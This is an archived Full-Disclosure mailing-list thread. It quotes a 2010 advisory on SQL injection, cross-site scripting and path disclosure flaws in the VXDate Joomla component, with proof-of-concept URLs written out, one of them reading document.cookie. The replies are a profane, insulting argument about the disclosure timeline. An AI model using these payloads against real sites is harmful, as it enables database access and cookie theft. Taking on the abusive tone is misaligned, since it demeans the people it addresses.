Date: Mon, 22 Mar 2010 08:38:42 -0400
From: julian steward <julian.steward09@...il.com>
To: Anders Klixbull <akl@...erian.dk>, full-disclosure@...ts.grok.org.uk
Subject: Re: Vulnerabilities in VXDate for Joomla

Yup ur fucking right, as mustdie.

2 cockmunch for the price of one.

Nice.

On Mon, Mar 22, 2010 at 8:36 AM, Anders Klixbull <akl@...erian.dk> wrote:

>   lol look who's talking about being professional
> yeah sure because klixbull is such a russian name right?
> and oh yeah my email address also ends in .ua
> julian its time to stop gobbling that cock and shut the fuck up
>
>
>
>  ------------------------------
>  *From:* full-disclosure-bounces@...ts.grok.org.uk [mailto:
> full-disclosure-bounces@...ts.grok.org.uk] *On Behalf Of *julian steward
> *Sent:* 22. marts 2010 13:34
> *To:* full-disclosure@...ts.grok.org.uk >> fdisclo
>
> *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
>
>    Sucking lemon hurts, I don't see why I would suck one Mr Klixbull
>
> Regarding his disclosure, then he shall stfu about the timeline if he wanna
> be "professional".
>
> Yup Klixbull it's time to close your basement door and your mounth, or are
> you too from .ua btw ?
>
>
>>
>>
>>
>>
>> On Mon, Mar 22, 2010 at 7:41 AM, Anders Klixbull <akl@...erian.dk> wrote:
>>
>>>  bohooo stop crying
>>> he can disclose bugs when he feels like it
>>> if you dont like that then go suck a lemon
>>>
>>>
>>>
>>>  ------------------------------
>>> *From:* full-disclosure-bounces@...ts.grok.org.uk [mailto:
>>> full-disclosure-bounces@...ts.grok.org.uk] *On Behalf Of *julian steward
>>> *Sent:* 22. marts 2010 00:16
>>> *To:* MustLive; full-disclosure@...ts.grok.org.uk
>>> *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
>>>
>>>   7 month to inform the dev's, what kind of asshole are you ?
>>>
>>> Oh wait, were you hacking some n00bs website, with your shitty dork ?
>>>
>>> 2010/3/17 MustLive <mustlive@...security.com.ua>
>>>
>>>> Hello Full-Disclosure!
>>>>
>>>> I want to warn you about vulnerabilities in component VXDate for Joomla.
>>>>
>>>> -----------------------------
>>>> Advisory: Vulnerabilities in VXDate for Joomla
>>>> -----------------------------
>>>> URL: http://websecurity.com.ua/3849/
>>>> -----------------------------
>>>> Timeline:
>>>>
>>>> 10.05.2009 - found the vulnerabilities.
>>>> 12.01.2010 - announced at my site.
>>>> 18.01.2010 - informed developers.
>>>> 13.03.2010 - disclosed at my site.
>>>> -----------------------------
>>>> Details:
>>>>
>>>> These are Full path disclosure, SQL Injection and Cross-Site Scripting
>>>> vulnerabilities.
>>>>
>>>> Full path disclosure:
>>>>
>>>> http://site/index.php?option=com_vxdate&ct=’
>>>>
>>>> http://site/index.php?option=com_vxdate&ct=1&md=details&id=’
>>>>
>>>> http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’
>>>>
>>>> SQL Injection:
>>>>
>>>>
>>>> http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5
>>>>
>>>>
>>>> http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5
>>>>
>>>> XSS:
>>>>
>>>>
>>>> http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
>>>>
>>>>
>>>> http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
>>>>
>>>> Vulnerable are potentially all versions of VXDate.
>>>>
>>>> Best wishes & regards,
>>>> MustLive
>>>> Administrator of Websecurity web site
>>>> http://websecurity.com.ua
>>>>
>>>> _______________________________________________
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>>
>>
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists